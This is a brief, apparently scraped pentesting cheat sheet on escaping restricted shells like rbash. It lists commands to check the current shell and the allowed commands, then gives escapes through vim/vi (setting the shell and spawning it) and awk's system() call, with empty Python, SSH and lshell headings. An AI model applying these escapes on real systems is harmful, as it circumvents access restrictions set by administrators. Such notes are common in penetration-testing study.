Restricted Shell Escapes
Determine what shell you are currently running in
echo $0 echo $SHELL-rbash
List commands you are permitted to run
compgen -cEscapes
VIM
vim
:set shell=/bin/bash
:shellVI
vi
:set shell=/bin/bash
:shellAWK
awk 'BEGIN {system("/bin/bash")}'Python
SSH
Local SSH (SSH to yourself specifying command
lshell
Last updated